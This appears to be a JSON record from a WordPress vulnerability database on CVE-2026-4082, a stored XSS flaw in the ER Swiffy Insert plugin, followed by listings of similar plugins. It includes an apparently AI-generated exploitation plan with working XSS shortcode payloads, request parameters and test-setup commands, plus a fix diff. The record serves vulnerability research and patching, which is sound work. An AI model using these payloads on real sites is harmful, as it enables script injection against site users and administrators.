[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fsf56PwGC6m0wzFKsntG5uQrtaD-YiE7on7pnMXUxkxw":3,"$fwj89IMt3kwK2HKF_3qQRnapdct5qd1pHfJJ0jQVxw3c":244,"$fPZ31qLJFhYoDkMhoCSu7EH4p5VeNDAO1iSwiNtHOSTE":249},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":14,"unpatched_count":14,"last_vuln_date":28,"fetched_at":29,"discovery_status":30,"vulnerabilities":31,"developer":58,"crawl_stats":37,"alternatives":63,"analysis":167,"fingerprints":224},"er-swiffy-insert","ER Swiffy Insert","1.0.0","ER (ET & RaveMaker)","https:\u002F\u002Fprofiles.wordpress.org\u002Ferithq\u002F","\u003Cp>ER Swiffy Insert allows you to use a shortcode to insert HTML5 animations generated with Google Swiffy.\u003Cbr \u002F>\nSwiffy converts Flash SWF files to HTML5, allowing you to reuse Flash content on mobile devices without Flash support.\u003C\u002Fp>\n","ER Swiffy Insert allows you to insert HTML5 animations generated with Google Swiffy.",10,2345,100,1,"2013-04-02T01:24:00.000Z","3.5.2","3.0.0","",[20,21,22,23,24],"er","html5","insert","shortcode","swiffy","http:\u002F\u002Fitekblog.com\u002Fwordpress-plugins\u002Fer-swiffy-insert\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fer-swiffy-insert.zip",63,"2026-04-21 19:06:24","2026-04-06T09:54:40.288Z","no_bundle",[32],{"id":33,"url_slug":34,"title":35,"description":36,"plugin_slug":4,"theme_slug":37,"affected_versions":38,"patched_in_version":37,"severity":39,"cvss_score":40,"cvss_vector":41,"vuln_type":42,"published_date":28,"updated_date":43,"references":44,"days_to_patch":37,"patch_diff_files":46,"patch_trac_url":37,"research_status":47,"research_verified":48,"research_rounds_completed":49,"research_plan":50,"research_summary":51,"research_vulnerable_code":52,"research_fix_diff":53,"research_exploit_outline":54,"research_model_used":55,"research_started_at":56,"research_completed_at":57,"research_error":37,"poc_status":37,"poc_video_id":37,"poc_summary":37,"poc_steps":37,"poc_tested_at":37,"poc_wp_version":37,"poc_php_version":37,"poc_playwright_script":37,"poc_exploit_code":37,"poc_has_trace":48,"poc_model_used":37,"poc_verification_depth":37},"CVE-2026-4082","er-swiffy-insert-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","ER Swiffy Insert \u003C= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The ER Swiffy Insert plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [swiffy] shortcode in all versions up to and including 1.0.0. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes ('n', 'w', 'h'). These attributes are extracted using extract() and directly interpolated into the HTML output without any escaping such as esc_attr(). This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",null,"\u003C=1.0.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-22 07:45:30",[45],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F074d9712-9b26-47da-9e24-49854fd7257c?source=api-prod",[],"researched",false,3,"# Research Plan: CVE-2026-4082 - ER Swiffy Insert Stored XSS\n\n## 1. Vulnerability Summary\nThe **ER Swiffy Insert** plugin (version \u003C= 1.0.0) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `[swiffy]` shortcode. The vulnerability exists because the plugin uses the PHP `extract()` function on user-provided shortcode attributes (`n`, `w`, and `h`) and directly interpolates these values into the HTML output without proper sanitization or escaping (e.g., using `esc_attr()`). Authenticated users with **Contributor** level permissions or higher can inject malicious scripts into posts, which will then execute in the context of any user (including Administrators) who views the post.\n\n## 2. Attack Vector Analysis\n*   **Shortcode:** `[swiffy]`\n*   **Vulnerable Attributes:** `n` (name\u002FID), `w` (width), `h` (height)\n*   **Authentication Level:** Contributor+ (Users who can create or edit posts)\n*   **Injection Point:** Post or Page content\n*   **Sink:** Frontend page rendering where the shortcode is processed.\n*   **Preconditions:** The plugin `er-swiffy-insert` must be active.\n\n## 3. Code Flow\n*Based on the vulnerability description, the expected code structure is:*\n\n1.  **Entry Point:** The plugin registers a shortcode handler:\n    `add_shortcode('swiffy', 'swiffy_insert_shortcode_handler');` (handler name inferred).\n2.  **Input Handling:** Inside the handler, the `$atts` array is processed:\n    ```php\n    \u002F\u002F Inferred code based on description\n    function swiffy_insert_shortcode_handler($atts) {\n        extract(shortcode_atts(array(\n            'n' => '',\n            'w' => '100%',\n            'h' => '500'\n        ), $atts));\n        \u002F\u002F ...\n    ```\n3.  **Vulnerable Sink:** The extracted variables `$n`, `$w`, and `$h` are placed directly into a string returned by the function:\n    ```php\n    \u002F\u002F Inferred vulnerable output\n    return '\u003Cdiv id=\"' . $n . '\" style=\"width:' . $w . '; height:' . $h . ';\">\u003C\u002Fdiv>';\n    ```\n4.  **Result:** Since `esc_attr()` is missing, an attacker can provide a value for `n` like `\">\u003Cscript>alert(1)\u003C\u002Fscript>` to break out of the `id` attribute and execute arbitrary JS.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability does not require a specific plugin-defined nonce for **execution**, as shortcodes are processed by WordPress core when rendering post content. However, to **inject** the shortcode as a Contributor, the attacker must be able to save a post.\n\n**To acquire the `_wpnonce` for saving a post:**\n1.  Log in as a Contributor user.\n2.  Navigate to `wp-admin\u002Fpost-new.php`.\n3.  Use `browser_eval` to extract the nonce: `browser_eval(\"document.querySelector('#_wpnonce').value\")`.\n4.  Alternatively, the agent can simply use the `browser_navigate` and `browser_type` tools to create a post manually, which bypasses the need to manually handle nonces in raw HTTP requests.\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication\nAuthenticate as a **Contributor** user.\n\n### Step 2: Inject Malicious Shortcode\nCreate a new post containing the malicious shortcode. We will target the `n` attribute.\n\n*   **Payload:** `[swiffy n='swiffy-obj\" onmouseover=\"alert(document.domain)\" style=\"position:fixed;top:0;left:0;width:100%;height:100%;\" data-x=\"']`\n    *   *Note: This payload breaks out of the `id` attribute and uses `onmouseover` covering the whole screen to ensure execution, or a simpler `\u003Cscript>` tag if the container allows.*\n*   **Alternative Payload:** `[swiffy n='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n\n### Step 3: Request Configuration\nIf using `http_request` (Playwright) to save the post:\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Method:** POST\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `editpost`\n    *   `post_ID`: `[ID of the post created in Step 2]`\n    *   `_wpnonce`: `[extracted nonce]`\n    *   `content`: `[swiffy n='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    *   `post_title`: `Stored XSS Test`\n    *   `post_status`: `publish` (Note: Contributors' posts go to 'pending', but the XSS is stored in the database regardless).\n\n## 6. Test Data Setup\n1.  **Plugin Activation:** Ensure `er-swiffy-insert` is installed and activated.\n2.  **User Creation:** Create a user with the `contributor` role.\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Target Post:** Create a post as the contributor.\n    *   `wp post create --post_type=post --post_status=draft --post_author=[User_ID] --post_title=\"XSS Source\"`\n\n## 7. Expected Results\n1.  When the post is viewed (even in \"Preview\" mode by the Contributor or \"Edit\" mode by an Admin), the shortcode handler will execute.\n2.  The resulting HTML will look like:\n    `\u003Cdiv id=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" style=\"width:100%; height:500;\">\u003C\u002Fdiv>`\n3.  The browser will execute the injected script, triggering an alert box with the domain name.\n\n## 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to verify the content of the post.\n    *   `wp post get [POST_ID] --field=post_content`\n2.  **Frontend Check:** Navigate to the post URL (as Admin) and check for the existence of the script in the HTML source.\n    *   Look for `\u003Cscript>alert(document.domain)\u003C\u002Fscript>` inside the rendered page content.\n\n## 9. Alternative Approaches\nIf the `n` attribute is restricted by other WordPress filters, try the `w` or `h` attributes:\n*   `[swiffy w='100%;\" onmouseover=\"alert(1)\"']`\n*   `[swiffy h='500;background:url(javascript:alert(1))']` (Works in older browsers or specific CSS contexts).\n\nIf the `extract()` call happens before `shortcode_atts()`, there might be a variable overwriting vulnerability, but the primary XSS vector remains the most direct path.","The ER Swiffy Insert plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the [swiffy] shortcode in versions up to 1.0.0. The plugin fails to sanitize or escape user-supplied shortcode attributes ('n', 'w', 'h') before outputting them in HTML, allowing authenticated users with Contributor-level access to inject arbitrary scripts into pages.","\u002F\u002F er-swiffy-insert.php (inferred from analysis)\nfunction swiffy_insert_shortcode_handler($atts) {\n    extract(shortcode_atts(array(\n        'n' => '',\n        'w' => '100%',\n        'h' => '500'\n    ), $atts));\n\n    \u002F\u002F The variables $n, $w, and $h are directly interpolated without escaping\n    return '\u003Cdiv id=\"' . $n . '\" style=\"width:' . $w . '; height:' . $h . ';\">\u003C\u002Fdiv>';\n}\nadd_shortcode('swiffy', 'swiffy_insert_shortcode_handler');","--- er-swiffy-insert.php\n+++ er-swiffy-insert.php\n@@ -1,8 +1,8 @@\n function swiffy_insert_shortcode_handler($atts) {\n-    extract(shortcode_atts(array(\n+    $a = shortcode_atts(array(\n         'n' => '',\n         'w' => '100%',\n         'h' => '500'\n-    ), $atts));\n-    return '\u003Cdiv id=\"' . $n . '\" style=\"width:' . $w . '; height:' . $h . ';\">\u003C\u002Fdiv>';\n+    ), $atts);\n+    return '\u003Cdiv id=\"' . esc_attr($a['n']) . '\" style=\"width:' . esc_attr($a['w']) . '; height:' . esc_attr($a['h']) . ';\">\u003C\u002Fdiv>';\n }","The exploit targets the [swiffy] shortcode, which is available to users with at least Contributor-level permissions. An attacker creates or edits a post and inserts a shortcode payload such as [swiffy n='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']. When an administrator or any other user views the post, the plugin's shortcode handler processes the 'n' attribute, breaks out of the HTML 'id' attribute context, and executes the injected script in the victim's browser context.","gemini-3-flash-preview","2026-04-27 14:00:53","2026-04-27 14:01:10",{"slug":59,"display_name":7,"profile_url":8,"plugin_count":14,"total_installs":11,"avg_security_score":27,"avg_patch_time_days":60,"trust_score":61,"computed_at":62},"erithq",30,68,"2026-07-15T05:07:52.274Z",[64,82,105,128,150],{"slug":65,"name":66,"version":67,"author":68,"author_profile":69,"description":70,"short_description":71,"active_installs":60,"downloaded":72,"rating":13,"num_ratings":14,"last_updated":73,"tested_up_to":16,"requires_at_least":74,"requires_php":18,"tags":75,"homepage":77,"download_link":78,"security_score":79,"vuln_count":80,"unpatched_count":80,"last_vuln_date":37,"fetched_at":81},"html5-swiffy-insert","HTML5 Swiffy Insert","1.2","yuanga","https:\u002F\u002Fprofiles.wordpress.org\u002Fyuanga\u002F","\u003Cp>HTML5 Swiffy Insert is a simple plugin that lets you to use a shortcode to insert HTML5 animations generated with Google Swiffy. Swiffy converts Flash SWF files to HTML5, allowing you to reuse Flash content on devices without a Flash player (such as iPhones and iPads).\u003C\u002Fp>\n","HTML5 Swiffy Insert lets you to insert HTML5 animations generated with Google Swiffy.",5559,"2013-04-06T15:40:00.000Z","3.0",[76,21,22,23,24],"animation","http:\u002F\u002Fwww.unniks.com\u002Fublog\u002Fhtml5-swiffy-insert\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fhtml5-swiffy-insert.zip",85,0,"2026-04-16T10:56:18.058Z",{"slug":83,"name":84,"version":85,"author":86,"author_profile":87,"description":88,"short_description":89,"active_installs":90,"downloaded":91,"rating":92,"num_ratings":93,"last_updated":94,"tested_up_to":95,"requires_at_least":96,"requires_php":18,"tags":97,"homepage":100,"download_link":101,"security_score":102,"vuln_count":103,"unpatched_count":80,"last_vuln_date":104,"fetched_at":81},"insert-pages","Insert Pages","3.11.3","Paul Ryan","https:\u002F\u002Fprofiles.wordpress.org\u002Ffigureone\u002F","\u003Cp>Insert Pages lets you embed any WordPress content (e.g., pages, posts, custom post types) into other WordPress content using the Shortcode API. It also includes a widget for inserting pages into any widget area.\u003C\u002Fp>\n\u003Cp>The real power of Insert Pages comes when you start creating custom post types, either \u003Ca href=\"https:\u002F\u002Fcodex.wordpress.org\u002FPost_Types\" rel=\"nofollow ugc\">programmatically in your theme\u003C\u002Fa>, or using another plugin like \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fcustom-post-type-ui\u002F\" rel=\"ugc\">Custom Post Type UI\u003C\u002Fa>. You can then abstract away common data types (like videos, quizzes, due dates) into their own custom post types, and then show those pieces of content within your normal pages and posts by Inserting them as a shortcode.\u003C\u002Fp>\n\u003Ch3>Advanced Tutorial\u003C\u002Fh3>\n\u003Cp>Contributor Wes Modes has graciously written an updated tutorial for the Gutenberg era, focused on creating a custom post type with custom fields and a custom template for rendering content. Read it here: \u003Ca href=\"https:\u002F\u002Fmedium.com\u002F@wesmodes\u002Fusing-wordpress-insert-pages-plugin-with-your-custom-post-types-and-custom-templates-535c141f9635\" rel=\"nofollow ugc\">https:\u002F\u002Fmedium.com\u002F@wesmodes\u002Fusing-wordpress-insert-pages-plugin-with-your-custom-post-types-and-custom-templates-535c141f9635\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Example: Normal Use Case\u003C\u002Fh3>\n\u003Cp>Say you teach a course and you’re constantly referring to an assignment due date in your course website. The next semester the due date changes, and you have to go change all of the locations you referred to it. Instead, you’d rather just change the date once! With Insert Pages, you can do the following:\u003C\u002Fp>\n\u003Col>\n\u003Cli>Create a custom post type called \u003Cstrong>Due Date\u003C\u002Fstrong>.\u003C\u002Fli>\n\u003Cli>Create a new \u003Cem>Due Date\u003C\u002Fem> called \u003Cstrong>Assignment 1 Due Date\u003C\u002Fstrong> with \u003Cstrong>Fri Nov 22, 2013\u003C\u002Fstrong> as its content.\u003C\u002Fli>\n\u003Cli>Edit all the pages where the due date occurs and use the \u003Cem>Insert Pages\u003C\u002Fem> toolbar button to insert a reference to the \u003Cem>Due Date\u003C\u002Fem> you just created. Be sure to set the \u003Cem>Display\u003C\u002Fem> to \u003Cstrong>Content\u003C\u002Fstrong> so \u003Cem>Fri Nov 22, 2013\u003C\u002Fem> shows wherever you insert it. The shortcode you just created should look something like this: \u003Ccode>[insert page='assignment-1-due-date' display='content']\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>That’s it! Now, when you want to change the due date, just edit the \u003Cem>Assignment 1 Due Date\u003C\u002Fem> custom post you created, and it will automatically be updated on all the pages you inserted it on.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Ch3>Example: Advanced Use Case\u003C\u002Fh3>\n\u003Cp>Say your site has a lot of video content, and you want to include video transcripts and video lengths along with the videos wherever you show them. You could just paste the transcripts into the page content under the video, but then you’d have to do this on every page the video showed on. (It’s also just a bad idea, architecturally!) With Insert Pages, you can use a custom post type and create a custom theme template to display your videos+transcripts+lengths just the way you want!\u003C\u002Fp>\n\u003Col>\n\u003Cli>Create a custom post type called \u003Cstrong>Video\u003C\u002Fstrong>.\u003C\u002Fli>\n\u003Cli>Use a plugin like \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fadvanced-custom-fields\u002F\" rel=\"ugc\">Advanced Custom Fields\u003C\u002Fa> to add extra fields to your new \u003Cem>Video\u003C\u002Fem> custom post type. Add a \u003Cstrong>Video URL\u003C\u002Fstrong> field, a \u003Cstrong>Transcript\u003C\u002Fstrong> field, and a \u003Cstrong>Video Length\u003C\u002Fstrong> field.\u003C\u002Fli>\n\u003Cli>Create a new \u003Cem>Video\u003C\u002Fem> called \u003Cstrong>My Awesome Video\u003C\u002Fstrong> with the following values in its fields:\n\u003Cul>\n\u003Cli>\u003Cem>Video URL\u003C\u002Fem>: \u003Cstrong>http:\u002F\u002Fwww.youtube.com\u002Fwatch?v=oHg5SJYRHA0\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cem>Transcript\u003C\u002Fem>: \u003Cstrong>We’re no strangers to love, You know the rules and so do I…\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>\u003Cem>Video Length\u003C\u002Fem>: \u003Cstrong>3:34\u003C\u002Fstrong>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Create a template in your theme so we can display the video content as we want. I won’t cover this step here since it’s pretty involved, but you can find more help in the \u003Ca href=\"https:\u002F\u002Fcodex.wordpress.org\u002FTheme_Development#Custom_Page_Templates\" rel=\"nofollow ugc\">WordPress Codex\u003C\u002Fa>. Let’s assume you created a template called \u003Cstrong>Video with transcript\u003C\u002Fstrong> (video-with-transcript.php) that shows the youtube video in a \u003Ca href=\"http:\u002F\u002Ffancybox.net\u002F\" rel=\"nofollow ugc\">fancybox\u003C\u002Fa>, and includes a button that shows the text transcript when a user clicks on it.\u003C\u002Fli>\n\u003Cli>Edit the pages where you want the video to show up and use the \u003Cem>Insert Pages\u003C\u002Fem> toolbar button to insert a reference to the \u003Cem>Video\u003C\u002Fem> you just created. Be sure to set the \u003Cem>Display\u003C\u002Fem> to \u003Cstrong>Use a custom template\u003C\u002Fstrong>, and select your new template \u003Cstrong>Video with transcript\u003C\u002Fstrong>. The shortcode you just created should look something like this: \u003Ccode>[insert page='my-awesome-video' display='video-with-transcript.php']\u003C\u002Fcode>\u003C\u002Fli>\n\u003Cli>That’s it! Now you can create all sorts of video content and know that it’s being tracked cleanly in the database as its own custom post type, and you can place videos all over your site and not worry about lots of duplicate content.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>The possibilities are endless!\u003C\u002Fp>\n","Insert Pages lets you embed any WordPress content (e.g., pages, posts, custom post types) into other WordPress content using the Shortcode API.",40000,1028552,96,71,"2026-03-31T00:34:00.000Z","6.9.4","3.3.0",[98,22,99,23],"embed","pages","https:\u002F\u002Fgithub.com\u002Fuhm-coe\u002Finsert-pages","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finsert-pages.3.11.3.zip",99,4,"2022-12-21 00:00:00",{"slug":106,"name":107,"version":108,"author":109,"author_profile":110,"description":111,"short_description":112,"active_installs":113,"downloaded":114,"rating":115,"num_ratings":14,"last_updated":116,"tested_up_to":117,"requires_at_least":118,"requires_php":119,"tags":120,"homepage":125,"download_link":126,"security_score":79,"vuln_count":14,"unpatched_count":80,"last_vuln_date":127,"fetched_at":81},"pixcodes","PixCodes","2.3.7","pixelgrade","https:\u002F\u002Fprofiles.wordpress.org\u002Fpixelgrade\u002F","\u003Cp>With \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fpixelgrade\u002Fpixcodes\" rel=\"nofollow ugc\">PixCodes\u003C\u002Fa> you can have a shortcode insert interface.\u003C\u002Fp>\n\u003Cp>The awesome part is that you can filter any shortcode parameters or overwrite any shortcode template with your theme.\u003C\u002Fp>\n\u003Cp>\u003Cem>Note:\u003C\u002Fem> this plugin does not add any style to the output of shortcodes.\u003C\u002Fp>\n\u003Cp>We believe that shortcodes functionality should be offered by a plugin and the style should be provided by themes.\u003C\u002Fp>\n\u003Cp>Here is a \u003Ca href=\"http:\u002F\u002Fgithub.com\u002Fpixelgrade\u002Fpixcodes\u002Fblob\u002Fmaster\u002FREADME.md\" rel=\"nofollow ugc\">detailed documentation\u003C\u002Fa> about how you can configure some plugin settings and output.\u003C\u002Fp>\n","PixCodes offers you a nice interface to add shortcodes into editor.",8000,205813,80,"2022-12-30T11:43:00.000Z","6.1.10","4.9.0","5.6.40",[121,22,122,123,124],"columns","shortcodes","sliders","tabs","https:\u002F\u002Fpixelgrade.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpixcodes.2.3.7.zip","2023-01-03 00:00:00",{"slug":129,"name":130,"version":131,"author":132,"author_profile":133,"description":134,"short_description":135,"active_installs":136,"downloaded":137,"rating":138,"num_ratings":139,"last_updated":140,"tested_up_to":141,"requires_at_least":142,"requires_php":18,"tags":143,"homepage":148,"download_link":149,"security_score":79,"vuln_count":80,"unpatched_count":80,"last_vuln_date":37,"fetched_at":81},"page-in-page","Page In Page","2.0.3","Cyril","https:\u002F\u002Fprofiles.wordpress.org\u002Ftcyr\u002F","\u003Cp>The page-in-page plugin has a very simple mission:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>Insert posts and pages within each other with no stress.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Bring your Facebook Page posts to your WP pages.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Show your Tweets in your WP blog.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>It provides possibilities to use both widgets and shortcodes. If using a widget you are only able to include pages within pages but if using the shortcode, you are able to able to insert posts\u002Fpages\u003Cbr \u002F>\nwithin other posts\u002Fpages.\u003C\u002Fp>\n\u003Cp>For Facebook Page posts, only the first 25 most recent posts are returned and for Tweets, only the first 20 most recent tweets are returned. In future releases maybe we will include pagination for social feeds.\u003C\u002Fp>\n\u003Ch3>Usage\u003C\u002Fh3>\n\u003Ch4>Using the widget\u003C\u002Fh4>\n\u003Cp>The settings in the widget include:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Cem>Title\u003C\u002Fem>: Widget Title. This title will be shown as the page’s title if ‘Show page title’ option is not selected.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cem>Page\u003C\u002Fem>: Select the page that will be included when widget is called.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cem>Show page title\u003C\u002Fem>: If checked (selected) then the page title will be shown and the ‘Widget Title’ ignored.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cem>Show title as link\u003C\u002Fem>: If checked (selected) the title will be displayed as a link to the page.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cem>Show page content\u003C\u002Fem>: If checked (selected) then the page content will be included in the output.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cem>Show featured image\u003C\u002Fem>: If checked (selected) then the featured image will be included in the output.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cem>Show featured image as link\u003C\u002Fem> : If checked (selected) then the featured image will be included and linked to page in the output.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cem>Output Template\u003C\u002Fem>: Insert an HTML template that will be used to display content of the widget. If not provided the default template will be used\u003C\u002Fp>\n\u003Cp>Slugs that can be used in your template are \u003Cstrong>${page_title}\u003C\u002Fstrong>, \u003Cstrong>${page_content}\u003C\u002Fstrong>, \u003Cstrong>${page_link}\u003C\u002Fstrong>, \u003Cstrong>${page_image}\u003C\u002Fstrong> . Each are self explanatory of what they will be replaced with.\u003C\u002Fp>\n\u003Cp>The default output template is\u003C\u002Fp>\n\u003Cp>\u003Cdiv class=”twl-page-in-page”>\u003C\u002Fp>\n\u003Cp>\u003Cspan class=”twl-page-in-page-title”>${page_title}\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Cdiv class=”twl-page-in-page-content”>\u003C\u002Fp>\n\u003Cp>\u003Cdiv class=”twl-page-in-page-image”>\u003Cimg src=”${page_image}” \u002F>\u003C\u002Fdiv>\u003C\u002Fp>\n\u003Cp>\u003Cdiv class=”twl-page-in-page-text”>${page_content}\u003C\u002Fdiv>\u003C\u002Fp>\n\u003Cp>\u003C\u002Fdiv>\u003C\u002Fp>\n\u003Cp>\u003C\u002Fdiv>\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Using shortcode\u003C\u002Fh4>\n\u003Cp>With shortcodes, you can insert posts in posts, pages in pages, posts in pages and vice versa.\u003C\u002Fp>\n\u003Cp>Settings that can be used in a shortcode are:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>id : The ID of the page\u002Fpost you want to insert\u003C\u002Fli>\n\u003Cli>show_page_title: should the page title be displayed? (Can be 1 for true or 0 for false. Defaults to 1)\u003C\u002Fli>\n\u003Cli>show_page_content: should the page title be displayed? (Can be 1 for true or 0 for false. Defaults to 1)\u003C\u002Fli>\n\u003Cli>show_title_as_link: Can be 1 for true or 0 for false. Defaults to 0. If set to 1, the page title will be displayed as a link to the page\u002Fpost\u003C\u002Fli>\n\u003Cli>show_featured_image: Can be 1 for true or 0 for false. Defaults to 0. If set to 1, the page’s featured image will be included\u003C\u002Fli>\n\u003Cli>show_featured_image_as_ink: Can be 1 for true or 0 for false. Defaults to 0. If set to 1, the page’s featured image will be included as a link\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Note that\u003C\u002Fstrong> if you are specifying a template in the shortcode, then the above settings will be ignored and the slugs you insert in your template will be replaced with appropriate content.\u003Cbr \u002F>\nSee a template example and allowed slugs above.\u003C\u002Fp>\n\u003Cp>To insert a shortcode you can do one of the following:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>To insert without specifying a template you can simply use\u003C\u002Fp>\n\u003Cp>[twl_page_in id=123] OR [twl_page_in id=123 show_page_title=1].\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>To insert your shortcode specifying a template for page\u002Fpost’s title and content use the following. You can include other supported slugs mentioned above\u003C\u002Fp>\n\u003Cp>[twl_page_in id=123 show_page_title=1]\u003C\u002Fp>\n\u003Cp>\u003Ch3 class=”my-awesome-title-class”>${page_title}\u003C\u002Fh3>\u003C\u002Fp>\n\u003Cp>\u003Cdiv class=”my-awesome-content-class”>${page_content}\u003C\u002Fdiv>\u003C\u002Fp>\n\u003Cp>[\u002Ftwl_page_in]\u003C\u002Fp>\n\u003Cp>The template specified in the [twl_page_in] tag will be used to display the page\u002Fpost with the specified id when inserting it. The template is optional and if not specified then the default template will be used.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>IMPORTANT!!!\u003C\u002Fstrong> If you specify a template, you MUST have the slugs you want to be shown else you might get unexpected results\u003C\u002Fp>\n\u003Cp>\u003Cstrong>IMPORTANT!!!\u003C\u002Fstrong> This template has to be defined when Editor is in ‘Visual’ mode and NOT in ‘Text’ mode (see screen shot). If you do not respect this you might have unexpected results because HTML tags might not be parsed properly.\u003Cbr \u002F>\nHowever if you have escaping with magic quotes off on your server then template should be defined when editor is in ‘Text’ mode.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>To insert posts from your Facebook page, Go to Admin > Settings > Page In Page Plugin and insert your facebook application credentials.\u003Cbr \u002F>\nNext edit the page where you want the posts to appear and insert the short code \u003Cstrong>[twl_page_in_fb]\u003C\u002Fstrong>. See screenshot 3 for output.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>To insert tweets from your twitter account, Go to Admin > Settings > Page In Page Plugin and insert your twitter application credentials.\u003Cbr \u002F>\nNext edit the page where you want the posts to appear and insert the short code \u003Cstrong>[twl_page_in_tw]\u003C\u002Fstrong>. See screenshot 4 for output.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>What Next?\u003C\u002Fh3>\n\u003Cp>Find a bug or got any worries? well never mind just send an email to cyril.tata@hotmail.com.\u003C\u002Fp>\n\u003Cp>Future releases: Integrate same functionality across multi sites and pagination for social page feeds.\u003C\u002Fp>\n\u003Ch3>2.0.3\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Remove non-GPL compatible jquery isotope library\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>2.0.2\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Important\u003C\u002Fstrong> In the widget, the “title template” and “content template” fields have been unified to “output template”. Template specification in editor remains unchanged but more slugs added.\u003C\u002Fli>\n\u003Cli>More settings added\n\u003Cul>\n\u003Cli>show page title (shortcode parameter: show_page_title. Can be 1 or 0)\u003C\u002Fli>\n\u003Cli>show page title as link (shortcode parameter: show_title_as_link. Can be 1 or 0)\u003C\u002Fli>\n\u003Cli>show page content (shortcode parameter: show_page_content. Can be 1 or 0)\u003C\u002Fli>\n\u003Cli>show featured image (shortcode parameter: show_featured_image. Can be 1 or 0)\u003C\u002Fli>\n\u003Cli>show featured image as link (shortcode parameter: show_featured_image_as_link. Can be 1 or 0)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>If an output template is specified, then the settings above are ignored so all necessary slugs should be specified in output template.\u003C\u002Fli>\n\u003Cli>Slugs to be used in templates: \u003Cstrong>${page_title}\u003C\u002Fstrong>, \u003Cstrong>${page_content}\u003C\u002Fstrong>, \u003Cstrong>${page_link}\u003C\u002Fstrong>, \u003Cstrong>${page_image}\u003C\u002Fstrong> .\u003C\u002Fli>\n\u003Cli>Usage of namespace for twitter SDK removed due to complaints for PHP \u003C 5.3 (this change is only for those who have not been able to use the twitter shortcode)\u003C\u002Fli>\n\u003Cli>Some code re-factoring\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>2.0.1\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>code 